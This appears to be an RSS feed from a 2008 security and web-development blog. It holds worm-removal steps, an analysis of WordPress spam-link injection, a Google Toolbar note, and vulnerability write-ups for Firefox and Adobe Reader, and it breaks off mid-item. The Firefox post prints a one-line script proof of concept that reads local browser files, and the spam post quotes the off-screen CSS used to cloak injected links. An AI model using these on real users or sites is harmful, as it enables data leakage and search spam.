<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; 2008 &#187; February</title>
	<atom:link href="http://42.kaizeku.com/2008/02/feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>How to remove XMSS.exe Win32 AutoRun worm</title>
		<link>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/</link>
		<comments>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/#comments</comments>
		<pubDate>Sat, 16 Feb 2008 11:58:21 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[autorun.abt]]></category>

		<category><![CDATA[autorun.fj]]></category>

		<category><![CDATA[autorun.m]]></category>

		<category><![CDATA[prank]]></category>

		<category><![CDATA[Virus]]></category>

		<category><![CDATA[win32]]></category>

		<category><![CDATA[xmss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/xmss-exe-funny-ust-scandal-avi-worm/</guid>
		<description><![CDATA[

Yesterday I got a new type of &#8220;Stupid Worm&#8221; hidding in background as xmss.exe. It copied itself on Local disk and Windows Directory (%Windir%). Terminated &#8220;Windows Task Manager&#8221;, Windows Command Prompt (DOS-Prompt) &#38; crashed System Internal Process Explorer (procxp.exe).
Its not a funny video
According to McAfee, this worm is known as W32/Autorun.worm.g.
It can propagate itself over [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/xmss-exe-funny-ust-scandal.png' alt='xmss-exe-funny-ust-scandal.png image by chaoskaizer' width='128' height='128' class="photo thumb- fl rgb-"/>Yesterday I got a new type of &#8220;Stupid Worm&#8221; hidding in background as <em>xmss.exe</em>. It copied itself on Local disk and Windows Directory <small>(%Windir%)</small>. Terminated &#8220;Windows Task Manager&#8221;, Windows Command Prompt (DOS-Prompt) &amp; crashed System Internal <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" class="exturl icn-r1" rel="nofollow robots-nofollow">Process Explorer</a> (procxp.exe).</p>
<h2 class="cb">Its not a funny video</h2>
<p class="xmssexe-descriptions">According to <a href="http://vil.nai.com/vil/content/v_143758.htm" rel="nofollow" class="exturl icn-r1">McAfee</a>, this worm is known as <strong><tt class="di">W32/Autorun.worm.g</tt></strong>.</p>
<blockquote cite="http://vil.nai.com/vil/content/v_143758.htm"><p class="cite">It can propagate itself over removable media and network drives and cause execution of malicious code via an <tt class="di">autorun.inf</tt> file.</p>
</blockquote>
<p><span id="more-217"></span></p>
<h2 class="mgt mgb-">XMSS.exe Win32 AutoRun Files</h2>
<ul class="xoxo exturl">
<li><strong class="fw-"><tt class="di">x:autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">x:xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">x:Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\Funny UST Scandal.avi.exe</tt></strong></li>
</ul>
<h2 class="cb mgt">Fixes Win32 AutoRun.* Worm</h2>
<p>Here&#8217;s a few step to prevent <strong class="fw-">Win32 AutoRun Worm</strong>. </p>
<ol class="xoxo">
<li>Disabled System Restore for Temporary - <a href="http://support.microsoft.com/kb/264887/en-us" class="exturl icn-r1" title="How to Enable and Disable System Restore">KB 264887</a></li>
<li>Boot Windows in Safe Mode - <a class="exturl icn-r1" href="http://support.microsoft.com/kb/315222" title="Safe Mode Boot options in Windows XP">KB 315222</a></li>
<li>
<p>In Windows Safe Mode, Open Windows Registry Editor</p>
<p><tt class="di">Windows Start > Run > Regedit</tt></p>
<li>
<p>Browse to the following registry settings &darr;</p>
<p><tt class="di">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</tt>
</li>
<li>Replace<br />
<em><tt class="di">explorer.exe, xmss.exe</tt></em> with <em><tt class="di">exporer.exe</tt></em><br />
<img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/xmss-exe-regedit.png' alt='xmss-exe-regedit.png' width="708" height="378" class="mgt mgb" />
</li>
<li>Delete all the following files
<ul class="xoxo">
<li><strong class="fw-"><tt class="di">C\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">C\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">C\Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\Funny UST Scandal.avi.exe</tt></strong></li>
</ul>
<p class="notice">%Windir% refers to the Windows folder (e.g. C:\Windows, C:\WindowsNT) and X: is drive letters used by a removable or network drive</p>
</li>
<li>Clean All Windows Temporary Files</li>
<li>Restart Windows</li>
</ol>
<h2 class="cb">XMSS.exe Win32 Autorun Variants</h2>
<p><small>VirusTotal.com - Dec 2007 Results.</small></p>
<table border="1">
<tr>
<td>Antivirus</td>
<td>Version</td>
<td>Last Update</td>
<td>Result</td</tr>
<tr>
<td>AhnLab-V3</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>AntiVir</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Authentium</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Avast</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>AVG</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>BitDefender</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Worm.AutoRun.abt</td</tr>
<tr>
<td>ClamAV</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Autoit-6</td</tr>
<tr>
<td>DrWeb</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>eSafe</td>
<td>-</td>
<td>-</td>
<td style="color: red;">suspicious Trojan/Worm</td</tr>
<tr>
<td>eTrust-Vet</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Ewido</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>FileAdvisor</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Fortinet</td>
<td>-</td>
<td>-</td>
<td style="color: red;">W32/Autoit.BG!tr</td</tr>
<tr>
<td>F-Prot</td>
<td>-</td>
<td>-</td>
<td style="color: red;">W32/Trojan!c4a4</td</tr>
<tr>
<td>F-Secure</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Win32.Autoit.bg</td</tr>
<tr>
<td>Ikarus</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Virus.Win32.AutoRun.pc</td</tr>
<tr>
<td>Kaspersky</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Win32.Autoit.bg</td</tr>
<tr>
<td>McAfee</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Microsoft</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>NOD32v2</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Win32/HackAV.P</td</tr>
<tr>
<td>Norman</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Panda</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Suspicious file</td</tr>
<tr>
<td>Prevx1</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.DoS.Win32.Opdos</td</tr>
<tr>
<td>Rising</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Worm.Win32.Autorun.jax</td</tr>
<tr>
<td>Sophos</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Sunbelt</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Symantec</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>TheHacker</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan/Autoit.bg</td</tr>
<tr>
<td>VBA32</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Virus.Win32.AutoRun.pc</td</tr>
<tr>
<td>VirusBuster</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.AutoIt.BB</td</tr>
<tr>
<td>Webwasher-Gateway</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Riskware.HackAV</td</tr>
</table>
<h2 class="mgt mgb-">External Links</h2>
<ul class="xoxo exturl">
<li><a href="http://support.microsoft.com/kb/264887/en-us">How to Enable and Disable System Restore</a></li>
<li><a href="http://support.microsoft.com/kb/315222">Safe Mode Boot options in Windows</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Blackhat SEO Spammer targeting High PR WordPress Blog</title>
		<link>http://42.kaizeku.com/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/</link>
		<comments>http://42.kaizeku.com/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/#comments</comments>
		<pubDate>Thu, 14 Feb 2008 20:14:48 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[owned]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[css cloacking]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[spamdexing]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/</guid>
		<description><![CDATA[thinkingphp.org (PR6) &#038; jensfrake.com (PR7) has been hijacked by “Wordpress Blackhat SEO Spammer” for this month. Both sites were running on WordPress 2.3.2.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/wordpress-blackhat-seo-spam.png' alt='wordpress-blackhat-seo-spam.png image by chaoskaizer' width="128" height="128" longdesc="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" class="photo thumb- fl" />I&#8217;ve been monitoring <span class="vcard"><a class="url fn microformat icn-r1" href="http://mattheaton.com" title="bluehost &#038; hostmonster CEO">mattheaton.com</a></span> &#8220;<strong class="fw-">wordpress.net.in goro spam injections</strong>&#8221; for this past few months. Noticeably, the blackhat spamming method is changing dramatically. For those who are still unaware of Wordpress Goro Spam please read my earlier post &rarr; <a href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/" title="Matt Heaton BlueHost HostMonster CEO's Official Blog Hacked">Wordpress.net.in Spam injection</a>&#038; <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/" title="Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II">Gaming Bluehost &#038; Hostmonster CEO&#8217;s Blog</a>.</p>
<p><a href="http://thinkingphp.org" class="exturl icn-r1" title="thinkingphp.org">thinkingphp.org </a><small>(PR6)</small> &#038; <a href="http://jensfrake.com" title="jensfrake.com" class="exturl icn-r1">jensfrake.com</a> <small>(PR7)</small> has been hijacked by &#8220;Wordpress Blackhat SEO Spammer&#8221; for this month. Both sites were running on <strong>WordPress 2.3.2</strong>. </p>
<p>By now the <strong class="fw-"><em title="id goro">&lt;div id=&#8221;goro&#8221;&gt;</em></strong> signature has been replaced with &#8220;Inline CSS&#8221; wrapper.</p>
<h3>Cloacking Check on Mattheaton.com</h3>
<dl class="def">
<dt>Normal Browser</dt>
<dd>32,246 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/mattheaton-com-source.txt' title='mattheaton-com-source.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">mattheaton-com-source.txt</a></dd>
<dt>Google bot</dt>
<dd>34,646 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/mattheaton-com-googlebot-source.txt' title='mattheaton-com-googlebot-source.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">mattheaton-com-googlebot-source.txt</a></dd>
<dt>Difference</dt>
<dd>2,400 characters</dd>
</dl>
<p><span id="more-209"></span></p>
<h3>Cloacking Check on jensfrake.com &#038; blog.jensfrake.com</h3>
<dl class="def">
<dt>Normal Browser</dt>
<dd>59,580 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/blogjensfrakecomsource.txt' title='blogjensfrakecomsource.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">blogjensfrakecom.txt</a></dd>
<dt>Google bot</dt>
<dd>59,699 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/blog-jensfrake-com-googlebot-source.txt' title='blog-jensfrake-com-googlebot-source.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">blogjensfrakecom-googlebot.txt</a></dd>
<dt>Difference</dt>
<dd>119 characters</dd>
</dl>
<p class="notice">While scanning jensfrake.com their server return 400-500 error, so we had to scan his (clone) subdomain blog.jensfrake.com instead of the main site</p>
<p>This time around, you wont see the spam on both of this website, all the spam links is position out of the client view-port (top -3337px, left -2227px). </p>
<p><small>another mathematical jokes, l33t.</small></p>
<pre>
&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;
</pre>
<h5 class="mgb-">What&#8217;s new with Goro spam 2008</h5>
<ul class="xoxo exturl">
<li>WordPress <= 2.3.2 is vulnerable to this attack. </li>
<li>Inject Spamlinks wrap with extra Inline CSS for cloacking</li>
<li>Target High PR Sites &rarr; PR5 and above</li>
</ul>
<h5 class="mgt mgb-">Related Post</h5>
<ul class="xoxo exturl">
<li><a class="inturl" href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/" title="Matt Heaton BlueHost HostMonster CEO Official Blog Hacked">Matt Heaton BlueHost HostMonster CEO&#8217;s Official Blog Hacked</a></li>
<li><a class="inturl" href="/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" title="How to Removed Wordpress.net.in Spam Injection">How to Removed Wordpress.net.in Spam Injection</a></li>
<li><a class="inturl" href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/" title="Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II">Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</a></li>
</ul>
<h3 class="mgt">External Links</h3>
<ul class="xoxo exturl">
<li><a href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" title="National Vulnerabilities Database (NVD) on Wordpress 2.0 &gt; 2.0.5 vulnerabilities">National Vulnerabilities Database (NVD) on Wordpress 2.0 &gt; 2.0.5 vulnerabilities</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Google Toolbar 5 &#946;eta</title>
		<link>http://42.kaizeku.com/google/google-toolbar-5-beta/</link>
		<comments>http://42.kaizeku.com/google/google-toolbar-5-beta/#comments</comments>
		<pubDate>Mon, 11 Feb 2008 19:41:48 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Google]]></category>

		<category><![CDATA[Web Browsers]]></category>

		<category><![CDATA[addons]]></category>

		<category><![CDATA[google+toolbar]]></category>

		<category><![CDATA[pr]]></category>

		<category><![CDATA[toolbar]]></category>

		<category><![CDATA[webmaster]]></category>

		<category><![CDATA[YouTube]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/google/google-toolbar-5-beta/</guid>
		<description><![CDATA[

Google Toolbar 5 (&#946;eta) is out. You can download it at toolbar.google.com/T5/. 
Whats New

Custom Button and new Google Gadgets Support
Smart suggestion for navigation error (ie: 400 - 500 error)
Google Notebook Integration - save notes and image
Improved Autofill

Check out the Google Toolbar 5 (beta) youtube videos &#8595;

Google Toolbar 5 (beta) New Features Screencast


External Links

Google Toolbar 5 [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/google-pin-preview-by-chaoskaizer.png' alt='google-pin-preview-by-chaoskaizer.png' longdesc="http://toolbar.google.com/T5/intl/en/index.html" width="128" height="128" class="photo thumb- fl"/><strong>Google Toolbar 5</strong> (&beta;eta) is out. You can download it at <a class="exturl icn-r1" href="http://toolbar.google.com/T5/intl/en/index.html">toolbar.google.com/T5/</a>. </p>
<h2>Whats New</h2>
<ul class="xoxo exturl">
<li><a href="http://toolbar.google.com/T5/intl/en/features.html#custombuttons">Custom Button and new Google Gadgets Support</a></li>
<li><a href="http://toolbar.google.com/T5/intl/en/features.html#ld">Smart suggestion for navigation error (ie: 400 - 500 error)</a></li>
<li><a href="http://toolbar.google.com/T5/intl/en/features.html#notebook">Google Notebook Integration - save notes and image</a></li>
<li><a href="http://toolbar.google.com/T5/intl/en/features.html#autofill">Improved Autofill</a></li>
</ul>
<p>Check out the Google Toolbar 5 (beta) youtube videos &darr;<br />
<span id="more-208"></span></p>
<h2 class="cb mgt">Google Toolbar 5 (beta) New Features Screencast</h2>
<div clas="mgt" style="width:450px;overflow:hidden;margin:0pt auto !important">
<object width="425" height="373"><param name="movie" value="http://www.youtube.com/v/M9Whs0IpK_g&amp;rel=0&#038;border=1"></param><param name="wmode" value="transparent"></param></object><embed src="http://www.youtube.com/v/M9Whs0IpK_g&amp;rel=0&amp;border=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="373"></embed></div>
<h2 class="cb mgt">External Links</h2>
<ul class="xoxo exturl">
<li><a href="http://toolbar.google.com/T5/intl/en/index.html" title="Download Google Toolbar 5 Beta">Google Toolbar 5 Beta Download Page</a></li>
<li><a href="http://toolbar.google.com/T5/intl/en/features.html" title="Google Toolbar 5 beta Features List">Google Toolbar 5 beta Features List</a></li>
<li><a href="http://googleblog.blogspot.com/2007/12/google-toolbar-take-your-tools-with-you.html" title="Google Toolbar: Take your tools with you">Google&#8217;s Blog &rarr; Google Toolbar: Take your tools with you </a>
<li><a href="http://www.google.com/support/toolbar/?hl=en">Google Toolbar Help Center</a></li>
<li><a href="http://www.mattcutts.com/blog/404-pages-in-google-toolbar/">Google&#8217;s Matt Cutts &rarr; How 404 pages work in Google Toolbar Beta 5 </a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/google/google-toolbar-5-beta/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Firefox 2.0.0.12 Information Leak</title>
		<link>http://42.kaizeku.com/security/exploit/firefox-20012-information-leak-vulnerability/</link>
		<comments>http://42.kaizeku.com/security/exploit/firefox-20012-information-leak-vulnerability/#comments</comments>
		<pubDate>Sun, 10 Feb 2008 11:21:37 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[Security]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/exploit/firefox-20012-information-leak-vulnerability/</guid>
		<description><![CDATA[

We are going to see Firefox 2.0.0.13 probably by end of this week. Check out this directory transversal code using view-sources: &#038; resource: scheme
view-source:resource:///
translate to file:///C:/Program%20Files/Mozilla%20Firefox/
You can read/include firefox pref settings with this code. &#60;script src=&#8221;view-source:resource:///greprefs/all.js&#8221;&#62;&#60;/script&#62; 
Workaround
Install No-script Add-ons.

Credits
Ronald van den Heetkamp at 0&#215;000000
External Links

Firefox 2.0.0.12 Information Leak POC


]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg' alt='Marvin Apbot costume by chaoskaizer' width="100" height="100" longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg" />We are going to see Firefox 2.0.0.13 probably by end of this week. Check out this directory transversal code using view-sources: &#038; resource: scheme<br />
<tt class="di">view-source:resource:///</tt><br />
translate to <tt class="di">file:///C:/Program%20Files/Mozilla%20Firefox/</tt></p>
<p>You can read/include firefox pref settings with this code. <tt>&lt;script src=&#8221;view-source:resource:///greprefs/all.js&#8221;&gt;&lt;/script&gt; </tt></p>
<h2 class="cb">Workaround</h2>
<p>Install <a class="exturl icn-r1" href="http://noscript.net/">No-script</a> Add-ons.</p>
<p><span id="more-197"></span></p>
<h2>Credits</h2>
<p><span class="vcard"><a class="url fn microformat icn-r1" href="http://www.0x000000.com/index.php?!=6"><span class="given-name">Ronald</span> <span class="family-name">van den Heetkamp</span></a> at <a class="url org exturl icn-r1" href="http://www.0x000000.com">0&#215;000000</a></span></p>
<h2>External Links</h2>
<ul>
<li><a class="exturl icn-r1" href="http://www.0x000000.com/index.php?i=515">Firefox 2.0.0.12 Information Leak POC</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/exploit/firefox-20012-information-leak-vulnerability/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Adobe Acrobat, Acrobat 3D &#038; Reader Multiple Vulnerabilities</title>
		<link>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</link>
		<comments>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/#comments</comments>
		<pubDate>Sat, 09 Feb 2008 14:35:38 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Acrobat Reader]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[acrobat]]></category>

		<category><![CDATA[acrobat3d]]></category>

		<category><![CDATA[adobe+reader]]></category>

		<category><![CDATA[buffer+overflow]]></category>

		<category><![CDATA[reader]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/</guid>
		<description><![CDATA[One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code. The code will run with the privileges of the target user opening the PDF document.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png' alt='adobe reader' longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/adobe_reader_7.png" width="110" height="110" title="Adobe Reader" class="photo thumb- fl" />A JavaScript <a class="exturl icn-r1" href="http://en.wikipedia.org/wiki/Buffer_overflow">Buffer Overflow</a> in <strong class="fw-"><a href="http://www.adobe.com/products/acrobat/">Adobe Acrobat</a></strong>, <strong class="fw-"><a href="http://www.adobe.com/products/acrobat3d/">Acrobat 3D</a></strong> &#038; <strong class="fw-"><a href="http://www.adobe.com/products/reader/">Reader</a></strong> allowed remote attacker to execute arbitrary code. The code will run with the privileges of the target user opening the PDF document. </p>
<p>Excerpt from <em>iDefense </em>Public Advisory;</p>
<blockquote cite="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656"><p class="cite">Adobe Reader and Acrobat implement a version of JavaScript in the EScript.api plug-in which is based on the reference implementation used in Mozilla products. One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code.</p>
</blockquote>
<h2>Workaround</h2>
<p>Disabled Adobe Reader &#038; Acrobat JavaScript. Perform Update &darr;</p>
<h2>Update -Adobe Acrobat &#038; Reader version 8.1.2 </h2>
<p>Adobe released version 8.1.2 of Adobe Reader, Acrobat &#038; Acrobat 3D to address<br />
these vulnerabilities.</p>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/go/getreader" title="Download Adobe Reader 8.1.2">Adobe Reader 7 and 8 users update to Adobe Reader 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3849" title="Download Acrobat 8.1.2 for Windows">Acrobat 8 users on Windows update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3856" title="Download Acrobat 8.1.2 for Mac">Acrobat 8 users on Macintosh update to Acrobat 8.1.2</a></li>
<li><a href="http://www.adobe.com/support/downloads/detail.jsp?ftpID=3850" title="Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2">Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2</a></li>
</ul>
<p class="mgt">These <a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=656" class="exturl icn-r1" >vulnerabilities</a> were discovered by <span class="vcard"><a href="http://labs.idefense.com/" class="url fn microformat icn-r1"><span class="give-name">Greg </span> <span class="family-name">MacManus</span></a> of <span class="org"><a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=655">VeriSign iDefense Labs</a></span></span>. </p>
<p><span id="more-194"></span></p>
<h2>Related Posts</h2>
<ul class="xoxo exturl">
<li><a class="inturl" href="/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/" title="How to safely remove AcroRd32Info.exe">How to safely remove AcroRd32Info.exe (Adobe Reader)</a></li>
</ul>
<h2 class="mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a href="http://www.adobe.com/support/security/advisories/apsa08-01.html" title="Security update available for Adobe Reader and Acrobat 8">Security update available for Adobe Reader and Acrobat 8 (APSA08-01)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/exploit/acrobat-reader-remote-exploit-buffer-overflow-vulnerability-apsa08-01/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Firefox 2.0.0.12 Security Release</title>
		<link>http://42.kaizeku.com/firefox/firefox-20012-security-release/</link>
		<comments>http://42.kaizeku.com/firefox/firefox-20012-security-release/#comments</comments>
		<pubDate>Fri, 08 Feb 2008 15:45:48 +0000</pubDate>
		<dc:creator>chaoskaizer.myopenid.com</dc:creator>
		
		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[Web Browsers]]></category>

		<category><![CDATA[browser]]></category>

		<category><![CDATA[cve]]></category>

		<category><![CDATA[gecko]]></category>

		<category><![CDATA[javascript]]></category>

		<category><![CDATA[thunderbird]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/firefox/firefox-20012-security-release/</guid>
		<description><![CDATA[

Firefox 2.0.0.12 Security Update fixes 7 Vulnerability &#38; 3 critical patch (memory corruption, JavaScript Engine Crashes).

 Known Vulnerabilities in Mozilla Products (Firefox 2.0.0.11) 

MFSA 2008-11

Web forgery overwrite with div overlay

Descriptions
Security researchers Emil Ljungdahl and Lars-Olof Moilanen demonstrated that, in cases where the entire contents of a page are enclosed in a &#60;div&#62; with absolute positioning, [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><a class="exturl icn-r1" href="http://www.mozilla.com/en-US/firefox/all.html"><strong>Firefox 2.0.0.12</strong></a> Security Update fixes <a class="exturl icn-r" href="http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox2.0.0.12">7 Vulnerability &amp; 3 critical patch</a> (memory corruption, <a class="exturl icn-r1" href="https://bugzilla.mozilla.org/buglist.cgi?bug_id=407720,390597,373344,398085,406572,391028,406036,402087">JavaScript Engine Crashes</a>).<br />
<span id="more-192"></span></p>
<h2 id="firefox2.0.0.12" class="cb"> Known Vulnerabilities in Mozilla Products (Firefox 2.0.0.11) </h2>
<dl class="xoxo def">
<dt class="b1t-"><a rev="site:mozilla" title="Mozilla Foundation Security Advisory" class="exturl icn-r1 low" href="http://www.mozilla.org/security/announce/2008/mfsa2008-11.html">MFSA 2008-11</a></dt>
<dd class="b1t-">
<h3 class="title- mg-">Web forgery overwrite with div overlay</h3>
<div class="dn">
<h4 class="mgt b1s b1b b1c-gray">Descriptions</h4>
